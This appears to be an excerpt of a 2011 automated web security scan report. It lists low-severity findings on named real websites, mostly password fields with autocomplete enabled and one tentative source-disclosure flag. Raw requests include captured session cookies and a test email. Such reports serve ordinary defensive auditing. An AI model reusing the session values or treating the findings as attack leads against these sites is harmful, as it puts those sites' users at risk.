Set-Cookie: DJSESSION=ORCS%3dna%2cus; path=/; domain=.wsj.com
Set-Cookie: DJCOOKIE=ORC%3dna%2cus; path=/; domain=.wsj.com; expires=Mon, 09-Jan-2012 01:21:36 GMT
Set-Cookie: wsjregion=na%2cus; path=/; domain=.wsj.com
FastDynaPage-ServerInfo: sbkj2kapachep06 - Sat 01/08/11 - 15:27:12 EST
Cache-Control: max-age=15
Expires: Sun, 09 Jan 2011 01:21:51 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=46
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 139880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</h4>

<form action="http://commerce.wsj.com/auth/submitlogin" id="login_form" name="login_form" method="post" onsubmit="suppress_popup=true;return true;">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="password" id="login_password" class="login_pswd" tabindex="2" value="" maxlength="30"/>
<input type="hidden" name="url" id="page_url" value=""/>
...[SNIP]...

11.13. http://themeforest.net/user/freshface/portfolio previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://themeforest.net
Path:	/user/freshface/portfolio

Issue detail

The page contains a form with the following action URL:

http://themeforest.net/signin/authenticate

The form contains the following password field with autocomplete enabled:

password

Request

GET /user/freshface/portfolio HTTP/1.1
Host: themeforest.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.14. http://wordpress.org/extend/plugins/wp-pagenavi/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://wordpress.org
Path:	/extend/plugins/wp-pagenavi/

Issue detail

The page contains a form with the following action URL:

http://wordpress.org/extend/plugins/bb-login.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /extend/plugins/wp-pagenavi/ HTTP/1.1
Host: wordpress.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.15. http://www.43things.com/person/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.43things.com
Path:	/person/

Issue detail

The page contains a form with the following action URL:

http://www.43things.com/auth/login

The form contains the following password field with autocomplete enabled:

person[password]

Request

GET /person/ HTTP/1.1
Host: www.43things.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.16. http://www.adbrite.com/mb/commerce/purchase_form.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.adbrite.com
Path:	/mb/commerce/purchase_form.php

Issue detail

The page contains a form with the following action URL:

https://www.adbrite.com/mb/commerce/login.php

The form contains the following password field with autocomplete enabled:

pword

Request

GET /mb/commerce/purchase_form.php?other_product_id=1482461&fg_state=a%3D%26search%3Dpandora%26directory-search-submit%3D%2B%2BGo%2B%2B%26pub_landing_version%3D3%26ut%3D1%253ATY%252FBEoIgFEX%252FhTUL1Izob0AJFVFBSC369x5qM62YOZx7L7zRM0f3N9J HTTP/1.1
Host: www.adbrite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.17. http://www.adbrite.com/mb/commerce/purchase_form.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.adbrite.com
Path:	/mb/commerce/purchase_form.php

Issue detail

The page contains a form with the following action URL:

https://www.adbrite.com/mb/commerce/login.php

The form contains the following password field with autocomplete enabled:

pword

Request

Response

11.18. http://www.facebook.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

11.19. http://www.facebook.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.facebook.com/

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

Response

11.20. http://www.facebook.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.facebook.com/?ref=sgm

The form contains the following password field with autocomplete enabled:

reg_passwd__

Request

GET /?ref=sgm HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;

Response

11.21. http://www.facebook.com/2008/fbml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/2008/fbml

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=zoSHS; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 09 Jan 2011 05:19:15 GMT
Content-Length: 11443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

11.22. http://www.facebook.com/Pogo previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/Pogo

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

11.23. http://www.facebook.com/pages/Packet-Storm-Security/116613458352817 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/pages/Packet-Storm-Security/116613458352817

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /pages/Packet-Storm-Security/116613458352817 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dcmsinter.net%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.cmsinter.net%252Fblog%252F%26extra_2%3DUS;

Response

11.24. http://www.facebook.com/peanutlabs previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/peanutlabs

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

11.25. https://www.facebook.com/connect/uiserver.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/connect/uiserver.php

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /connect/uiserver.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;

Response

11.26. https://www.facebook.com/login.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/login.php

Issue detail

The page contains a form with the following action URL:

https://login.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; expires=Tue, 08-Jan-2013 05:27:42 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=tJ98F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Flogin.php; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 09 Jan 2011 05:27:42 GMT
Content-Length: 16799

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="login_form_container"><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
</label><input type="password" class="inputpassword" id="pass" name="pass" value="" /></div>
...[SNIP]...

11.27. http://www.gamespot.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.gamespot.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://authorize.gamespot.com/1324-2425-8.html

The form contains the following password field with autocomplete enabled:

PASSWORD

Request

GET / HTTP/1.1
Host: www.gamespot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.28. http://www.mlive.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mlive.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.mlive.com/

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.mlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=1
Expires: Sun, 09 Jan 2011 01:44:45 GMT
Date: Sun, 09 Jan 2011 01:44:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><script type="text/javascri
...[SNIP]...
<div class="top">
<form id="ToprailSigninForm" name="ToprailSignInForm" method="post" action="" onsubmit="document.getElementById('login_return_url').value=document.location.href;return true;">
<input type="hidden" name="__mode" value="do_login" />
...[SNIP]...
</label>
<input type="password" id="tr_login_password" name="password" value="" class="field" size="30" />
</div>
...[SNIP]...

11.29. http://www.onestat.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.onestat.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.onestat.com/Default.aspx

The form contains the following password field with autocomplete enabled:

MemberLoginCompact1$Login1$Password

Request

GET / HTTP/1.1
Host: www.onestat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.30. http://www.pandora.com/login.vm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pandora.com
Path:	/login.vm

Issue detail

The page contains a form with the following action URL:

https://www.pandora.com/login.vm

The form contains the following password field with autocomplete enabled:

login_password

Request

GET /login.vm?target=%2Fbackstage HTTP/1.1
Host: www.pandora.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/backstage
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; __qca=P0-1331252260-1294536122836; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; __utmb=118078728.4.10.1294536123

Response

11.31. http://www.pandora.com/people/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pandora.com
Path:	/people/

Issue detail

The page contains a form with the following action URL:

https://www.pandora.com/login.vm

The form contains the following password field with autocomplete enabled:

login_password

Request

GET /people/ HTTP/1.1
Host: www.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:20:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 13116

<html>

<head>

<title>Pandora Radio - Listen to Free Internet Radio, Find New Music</title>


       <link rel="stylesheet" type="text/css" href="/styles/pandora_styles.css" />


<link rel="alter
...[SNIP]...
<div id="content">
       <form name="loginform" action="https://www.pandora.com/login.vm" method="POST">
           <b>
...[SNIP]...
<br>
           <input type="password" name="login_password" size="20" style="font-size:10px;">  
           <input type="image" src="/images/login.gif" style="position:relative;top:6px;" onMouseOver="this.src='/images/login_hover.gif';" onMouseOut="this.src='/images/login.gif';">
...[SNIP]...

11.32. http://www.peanutlabs.com/adminLogin.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.peanutlabs.com
Path:	/adminLogin.php

Issue detail

The page contains a form with the following action URL:

http://www.peanutlabs.com/?cmd=admin_login

The form contains the following password field with autocomplete enabled:

varPassword

Request

Response

11.33. http://www.pogo.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.pogo.com/action/pogo/lightreg/module.do?pageSection=Home-reg-module-3

The form contains the following password fields with autocomplete enabled:

password
password_confirm

Request

Response

11.34. http://www.pogo.com/account/verify-password.do previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/account/verify-password.do

Issue detail

The page contains a form with the following action URL:

http://www.pogo.com/account/verify-password.do

The form contains the following password field with autocomplete enabled:

password

Request

Response

11.35. http://www.pogo.com/action/pogo/lightregview.do previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pogo.com
Path:	/action/pogo/lightregview.do

Issue detail

The page contains a form with the following action URL:

http://www.pogo.com/action/pogo/lightreg.do

The form contains the following password fields with autocomplete enabled:

password
password_confirm

Request

Response

11.36. https://www.pogo.com/action/pogo/signin.do previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.pogo.com
Path:	/action/pogo/signin.do

Issue detail

The page contains a form with the following action URL:

https://www.pogo.com/action/pogo/login.do

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 01:44:52 GMT
Server: Apache-Coyote/1.1
Content-Length: 26159

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<td width="590" id="main" valign="top">

   <form name="loginLoginform" method="post" action="/action/pogo/login.do">

   <div class="page-hdr-wrapper">
...[SNIP]...
<td class="desc">
                   <input type="password" name="password" maxlength="16" size="13" tabindex="2" value="">
               </td>
...[SNIP]...

11.37. http://www.rockband.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.rockband.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.rockband.com/

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.rockband.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.38. http://www.weather.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.weather.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://registration.weather.com/ursa/login

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.weather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
SVRNAME: wxii2x06
Cache-Control: max-age=30
Expires: Sun, 09 Jan 2011 01:44:21 GMT
Content-Language: en-US
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 168646
Date: Sun, 09 Jan 2011 01:44:02 GMT
X-Varnish: 736582048 736569742
Age: 11
Via: 1.1 varnish
Connection: keep-alive
X-Cache-Hits: 22

<!DOCTYPE HTML>

                                                                                                                                                   <html lang="en">
<head>

<TITLE>National and Local Weath
...[SNIP]...
<ul class="twc-tier-2">
   <form class="twc-sign-in" action="https://registration.weather.com/ursa/login" method="post">
       <label for="twc-header-uid">
...[SNIP]...
</label>
       <input class="twc-password twc-text-box" id="twc-header-pwd" type="password" name="password" value="" title="">
       <input class="twc-sign-in-button" title="Sign In" type="submit" value="Sign In">
...[SNIP]...

11.39. http://www.weather.com/weather/local/48617 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.weather.com
Path:	/weather/local/48617

Issue detail

The page contains a form with the following action URL:

https://registration.weather.com/ursa/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /weather/local/48617 HTTP/1.1
Host: www.weather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 09 Jan 2011 01:44:04 GMT
Server: Apache
SVRNAME: web2x00
Location: http://www.weather.com/weather/today/Clare+MI+48617
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=7403
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85909

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<HTML>
   <HEAD>
       <TITLE>Page Not Found</TITLE>
<script language="JavaScript">
var usingGrids =
...[SNIP]...
<ul class="twc-tier-2">
   <form class="twc-sign-in" action="https://registration.weather.com/ursa/login" method="post">
       <label for="twc-header-uid">
...[SNIP]...
</label>
       <input class="twc-password twc-text-box" id="twc-header-pwd" type="password" name="password" value="" title="">
       <input class="twc-sign-in-button" title="Sign In" type="submit" value="Sign In">
...[SNIP]...

11.40. http://www.weather.com/weather/local/48858 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.weather.com
Path:	/weather/local/48858

Issue detail

The page contains a form with the following action URL:

https://registration.weather.com/ursa/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /weather/local/48858 HTTP/1.1
Host: www.weather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 09 Jan 2011 01:44:04 GMT
Server: Apache
SVRNAME: web2x03
Location: http://www.weather.com/weather/today/Mount+Pleasant+MI+48858
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=7380
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85910

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<HTML>
   <HEAD>
       <TITLE>Page Not Found</TITLE>
<script language="JavaScript">
var usingGrids =
...[SNIP]...
<ul class="twc-tier-2">
   <form class="twc-sign-in" action="https://registration.weather.com/ursa/login" method="post">
       <label for="twc-header-uid">
...[SNIP]...
</label>
       <input class="twc-password twc-text-box" id="twc-header-pwd" type="password" name="password" value="" title="">
       <input class="twc-sign-in-button" title="Sign In" type="submit" value="Sign In">
...[SNIP]...

11.41. http://www.weather.com/weather/local/48879 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.weather.com
Path:	/weather/local/48879

Issue detail

The page contains a form with the following action URL:

https://registration.weather.com/ursa/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /weather/local/48879 HTTP/1.1
Host: www.weather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 09 Jan 2011 01:44:05 GMT
Server: Apache
SVRNAME: web2x05
Location: http://www.weather.com/weather/today/Saint+Johns+MI+48879
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=7495
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85910

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<HTML>
   <HEAD>
       <TITLE>Page Not Found</TITLE>
<script language="JavaScript">
var usingGrids =
...[SNIP]...
<ul class="twc-tier-2">
   <form class="twc-sign-in" action="https://registration.weather.com/ursa/login" method="post">
       <label for="twc-header-uid">
...[SNIP]...
</label>
       <input class="twc-password twc-text-box" id="twc-header-pwd" type="password" name="password" value="" title="">
       <input class="twc-sign-in-button" title="Sign In" type="submit" value="Sign In">
...[SNIP]...

11.42. http://www.weather.com/weather/local/USMI0020 previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.weather.com
Path:	/weather/local/USMI0020

Issue detail

The page contains a form with the following action URL:

https://registration.weather.com/ursa/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /weather/local/USMI0020 HTTP/1.1
Host: www.weather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 09 Jan 2011 01:44:03 GMT
Server: Apache
SVRNAME: web2x07
Location: http://www.weather.com/weather/today/Alma+MI+USMI0020
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=7485
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85909

   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<HTML>
   <HEAD>
       <TITLE>Page Not Found</TITLE>
<script language="JavaScript">
var usingGrids =
...[SNIP]...
<ul class="twc-tier-2">
   <form class="twc-sign-in" action="https://registration.weather.com/ursa/login" method="post">
       <label for="twc-header-uid">
...[SNIP]...
</label>
       <input class="twc-password twc-text-box" id="twc-header-pwd" type="password" name="password" value="" title="">
       <input class="twc-sign-in-button" title="Sign In" type="submit" value="Sign In">
...[SNIP]...

11.43. http://www.xanga.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.xanga.com
Path:	/

Issue detail

The page contains a form with the following action URL:

http://www.xanga.com/default.aspx

The form contains the following password field with autocomplete enabled:

XangaHeader$txtSigninPassword

Request

GET / HTTP/1.1
Host: www.xanga.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12. Source code disclosure previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.peanutlabs.com
Path:	/publisher/dashboard2/framework_3.2.0.3958.swz

Issue detail

The application appears to disclose some server-side source code written in PHP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /publisher/dashboard2/framework_3.2.0.3958.swz HTTP/1.1
Host: www.peanutlabs.com
Proxy-Connection: keep-alive
Referer: http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard2.swf?id=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); pl_email=test4%40fastdial.net; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.2.10.1294536629; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6

Response

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 01:35:43 GMT
Server: Apache
Last-Modified: Fri, 12 Feb 2010 07:15:38 GMT
ETag: "822f3-8a2e3-47f6208ccba80"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 565987

0.....    *.H..........0.......1.0    ..+......0.....    *.H.........|....wCWS    ....x...    .eYU .C...!....b...........Y.... ".*......nD\....{......(.P?.|..e.v....n.~.E.*.v5.....QQ
.B....[........"A...*..3.....>
...[SNIP]...
<AC...~..ap...I..]n..0X........q..........Nn....`.B.f!........k>\..[H6.y.G++.......=..r=..z=R..h..P.....O..|............>C......zM.W...N..B:.B^..o.CF.z.Hi.W(33<?.T.R^...Mo..:.+..'.ox..V......h..G.X....>D.Dd4......q
...X.......b...6....4......>...+...a.[......YUp.Y.......!...WG#.'.0e{.    ...../.AO.....8;......q.
3.......[nD.........0...6..*..0y.Yf;....}..f~;{.Y.<hXk&Z>{0....,.....|p.Y..........ZY>`...b..j.fY......O..h^..l..6....q...Z..FC.Yv.c8.&k..f.c.!.L$w.f.e..C.Y.s..c..].\3..yfYWg.7.....f=.4..H.AS`v.e.......#...M{.P.6.v.0|..:<Vu.x..2.3.g.....T.3I....3.n7+OD.......l@:. ...{../CC$E...+.YD...h%Z...4{J."wq..Ow.....*^...j.'K...%....M..=.s.l>..=]VD.a..4.....N........f...7...^.......Z:........z..RP.F.."..H.n..............;..m0+}..Y.S.f.S..2+..Mfeo..5..l1c?.h..4.......8bV.V..k%Gi..eMJT..w|....c...Q..U.G.@.R.*<.>.!.......(u....iP.. gP..Q..$.T.[.u*...cQ...<..@
.r".Kq.nT.dT..p*...t...'..C.A.:...};g>..~.7..../F..f.......\2......F.D..m.......OB^.........b.{.U/.]...S.0j].....-..n....z./...x..5T..)je.~....P.7o..a.}.u.,......)......|.u....J..>...J....PO....s...U.z.......A.....nTv.^..i..P.1o.na.....H.Q.......t.z..8.../>...k.=.^[`.g.t.f.3.Y..>..r....e+R<.\.C.)Z...9.......b.......m.gf..g|..g...Y.^l|....fY.5..........7...f..`....f..%..kj........{..|..Yftn...NK>a....F./.....?.......t...H.....:D....C.0.T.Y.`b..=..&...=]fZ...|:Y...YiZ..,.0-.!.......dr.....*...d....DW.H.>.&..d....8L3..W...~...^.W.....E..UxF.=*....&.C.x.....5.B..8..!].3=TS?3}....x.i.A.......
q..........6.7~..D..v..1X....:Z].F.4.*=.mM..
..am.........9..c$7h.........~w..[...].c...J..X.K~C......u1...|.J....b."/..?c.Y....65...
nSa.
k....{.....#.[....bm4Fc.'zc.a....-\...Sb.WF..e....S..N..=[.7....NCg+'....C...e..........pY..]...j....k......}.=].F.E.N.:..z2.J...Tt.J...6....%.Gdgc....j......="..=b.y.Y..3;]7..g#.f.......N..y.Z.7...,....r.6...#.<3.Q...|ePb...:.C.o.......gDS..<7..rO.....
